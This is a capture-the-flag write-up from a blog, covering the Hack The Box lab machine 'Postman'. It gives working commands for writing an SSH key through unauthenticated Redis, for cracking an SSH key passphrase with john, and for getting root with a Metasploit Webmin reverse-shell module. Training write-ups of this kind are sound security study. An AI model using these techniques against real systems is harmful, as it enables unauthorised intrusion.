26th January 2022
Hack The Box Write-Up Postman by T13nn3s

Hack The Box Write-Up Postman –

A hacker does for love what others would not do for money.

Laura Creighton

About Postman

In this post, I’m writing a write-up for the machine Postman from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Postman is an ‘easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Machine Info

Machine Info
Machine IP and creator


Portscan (Nmap)

First, I start with a portscan with Nmap. My initial Nmap scan missed the 6379 port. So, I scanned the target again with the port range 1-10000.

~$ nmap -p 1-10000 -sC -sV -oA ./nmap/postman.txt

The results:

Nmap scan report for                                                                                                                                                                        
Host is up (0.033s latency).                                                                                                                                                                             
Scanned at 2020-02-07 20:51:34 CET for 2957s                                                                                                                                                             
Not shown: 9965 closed ports                                                                                                                                                                             
PORT      STATE    SERVICE        VERSION                                                                                                                                                                
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                           
| ssh-hostkey:                                                                                                                                                                                           
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)                                                                                                                                           
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis          Redis key-value store 4.0.9
10000/tcp open     http           MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ndmp-version: 
|_  ERROR: Failed to get host information from server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  7 21:40:51 2020 -- 1 IP address (1 host up) scanned in 2958.40 seconds

There are three open ports:

  • 22/tcp (SSH)
  • 80/tcp (HTTP Apache Web Server)
  • 6379/tcp (Redis 4.0.9)
  • 10000/tcp (HTTP MiniServ 1.910)

Enumeration Web Server

I start enumerating the webserver and visited the website on I landed on a good looking web page from Cyber Geek. And it seems that I’m welcome.

The webpage on

Looked through the website, but there are no usable pages. There is a username listed on the information bar at the bottom [email protected]. With wfuzz I have tried some wordlists, got some default folders, but nothing juicy. There is also a higher port open, let’s check the higher port.

Enumeration Webmin

I visited the following webpage: and the is a message visible that we have to visit this website on HTTPS, so I changed the protocol and visited this page: And I have a login page.

Webmin on

There is also nothing here on this webpage. I need to have valid credentials to log in, but I still don’t have any credentials yet. Go to the next port 6397.

Enumerate Redis

As Redis 4.0.9 is installed on this box, it is vulnerable for Unauthenticated Code Execution. I searched on the internet for an exploit and comes up with this page: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html. I invoked this command below:

~$ telnet 6379
Connected to
Escape character is '^]'.
echo "Hey no AUTH required!"
Hey no AUTH required!
Connection closed by foreign host.

This works, there is no authentication needed. Redis is unprotected installed without any password. Let’s exploit this vulnerability!


Unauthenticated code execution

I can write files to this box without any authentication. Let’s try to create a new SSH Key. I invoked this command below:

~$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /home/htb/boxes/machines/postman/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/htb/boxes/machines/postman/id_rsa.
Your public key has been saved in /home/htb/boxes/machines/postman/id_rsa.pub.
The key fingerprint is:
SHA256:ZGnXXxEXku0kHb5YIhcPsW4xC3W+WuVNrYY5w28dVh0 [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|             *=E=|
|         . ..oX+*|
|        = .o.*+=B|
|       + . .=+B**|
|        S   *=+*o|
|            .=+..|
|             .o .|
|             .   |
|                 |

I created this RSA key pair with no password. Now I’ve got the key. This key needs to put into the memory of this box. I need to convert this key to the RDB format. I copied the id_rsa.pub to a text file. I added "\n\n on the front line and \n\n" on the last line, the contents of this file are shown below:

"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohf
= [email protected]\n\n"

Now the id_rsa.txt is just our public key but with newlines. I copied the content of this file to my clipboard and created a telnet session and invoked the commands below to load this key in the memory.

~$ telnet 6379                             
Connected to
Escape character is '^]'.
set s-key "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcDCqfaDbp4EzyGlF3ekfopSKbq1aFbymf5H3cr6S442cvHpJ1LgSVAUUmFJXC6K6AjtQUgNm8PTljLEUp2vcTquNJo61eN3EpWJjj0SJujVohfe/NCMosZ9t/ClKT+PN0rcRUMk6SyUAAP/ODHBbfIJxB2UPbNANDZSZzOYZ+5p4Uhyoti0qPdD8p7mQdfriCI4HqVBEgOYCoVTLYZcvTEVMV01abTc92opLsocAiwX/0OTpfyQRwhUO3kKEPEPzT3AcijW/0wcjrdtHMd4YylFmLanQTaVB1xdMKXoLczu3KqdJYr0Q4sI6R81SvUcN718tkOeLfi+2e3tEa3XfmZxk7oGzj0s4KOYaKZ2DFhm0y8p85x0uAb9MKh3B8FeCpvwaAUzpSMGPCveqzhrM2b/XYba545ZycNfjGlkxW40QQHpT1no9Oqp7KqjvHK/3XYuiNzaZl1nsa+VSaSBk139pq+kfCf2kOjWMiMV/oW0fHjdE6ty9pA3y7t66JVBE= [email protected]\n\n"
config set dir /var/lib/redis/.ssh                
config set dbfilename authorized_keys             
Connection closed by foreign host.

Everything looks good. Now I try to create an SSH session to this box. If everything was configured properly, I get a session without filling in any credentials.

~$ ssh -i ./id_rsa  [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Feb  7 22:04:13 2020 from
[email protected]:~$

I’m having now an SSH session as the user redis to this box!

[email protected]:~$ whoami
[email protected]:~$ pwd
[email protected]:~$

Enumeration on user

I have an active session with this box. Let’s poke some around and let’s check if I can find the user.txt. There is a home folder for the user Matt. It seems that the user redis does not have access to open the user.txt file.

[email protected]:~$ cd /home/
[email protected]:/home$ ls
[email protected]:/home$ cd Matt/
[email protected]:/home/Matt$ ls
[email protected]:/home/Matt$ cat user.txt 
cat: user.txt: Permission denied
[email protected]:/home/Matt$

It takes me some hours searching and poking around. It’s was driving me insane when it turned out I couldn’t find anything useful. After a little walk outside, I decided to put my previous boxes knowledge to the test and tried to use the grep command for searching for useful files. As grep is not working on this machine, I tried the ‘find’ command. After some searching, I couldn’t believe my eyes! I just found a backup of a private key!

[email protected]:/$ find . -name "id_rsa*" -print -quit

This has to be the private key of the user Matt!

[email protected]:/opt$ cat id_rsa.bak 
Proc-Type: 4,ENCRYPTED

I copied the content to the file ‘id_rsa.bak’ on my Kali machine and gave it to ssh2john:

~# python ssh2john.py id_rsa.bak 

Placed this hash into ‘ssh_password.txt’ and let john crack the passphrase:

~# john ssh_pssword.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)

That’s an easy password. Let’s try to create a connection with ssh. It turns out that Matt doesn’t have permission to access through SSH. After all those hours of work, this was just a disappointment for me and came hard. I had to get myself back under control, with a cup of coffee, before I could go on.

Get user.txt

I logged back in as regis. Maybe I can switch to Matt with the su Matth command. And it is possible to switch accounts and getting the user flag!

sudo: unable to initialize policy plugin
[email protected]:~$ su Matt
[email protected]:/var/lib/redis$ cat /home/Matt/user.txt 
[email protected]:/var/lib/redis$

It’s still very exciting to grab the user flag.


Exploit Webdmin (Metasploit)

Now go on root! I feel like there’s been a horse in the living room for hours, and we haven’t done anything about it…. The name of the horse: Webadmin. I go back to the Webmin portal on and logged in as Matt.

Matt has access to the Software Package Updates

Matt has access to the Software Package Updates and I found on the internet an article (https://www.exploit-db.com/exploits/46984). There is a module in Metasploit available to exploit this vulnerability. I invoked this command: msfconsole and exploited Webmin and grabbed the root.txt flag.

msf5 > use exploit/linux/http/web                                                                                                                                                                        
use exploit/linux/http/webcalendar_settings_exec  use exploit/linux/http/webid_converter            use exploit/linux/http/webmin_backdoor            use exploit/linux/http/webmin_packageup_rce        
msf5 > use exploit/linux/http/webmin_packageup_rce                                                                                                                                                       
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts                                                                                                                                  
rhosts =>                                                                                                                                                                                   
msf5 exploit(linux/http/webmin_packageup_rce) > set username Matt                                                                                                                                        
username => Matt                                                                                                                                                                                         
msf5 exploit(linux/http/webmin_packageup_rce) > set password computer2008                                                                                                                                
password => computer2008                                                                                                                                                                                 
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true                                                                                                                                             
ssl => true                                                                                                                                                                                              
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost                                                                                                                                    
lhost =>                                                                                                                                                                                     
msf5 exploit(linux/http/webmin_packageup_rce) > exploit                                                                                                                                                  
[*] Started reverse TCP handler on                                                                                                                                                      
[+] Session cookie: af1882183da1a304a49faf5183463233                                                                                                                                                     
[*] Attempting to execute the payload...                                                                                                                                                                 
[*] Command shell session 1 opened ( -> at 2020-02-08 00:23:06 +0100                                                                                                                                                                                                                                                                shell                                                                                                                                                                                                                                                                                                                                                                                                           
[*] Trying to find binary(python) on target machine                                                                                                                                                      
[*] Found python at                                                                                                                                                                                      
[*] Using `python` to pop up an interactive shel
cat /root/root.txt

Rooted this box. I have to say that this is the easiest privilege escalation I have ever done on Hack The Box. Do you have liked this Write-Up? Please consider spending some respect points. My profile: https://www.hackthebox.eu/profile/224856. Many thanks in Advance!!

Als always: Happy Hacking!


I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published.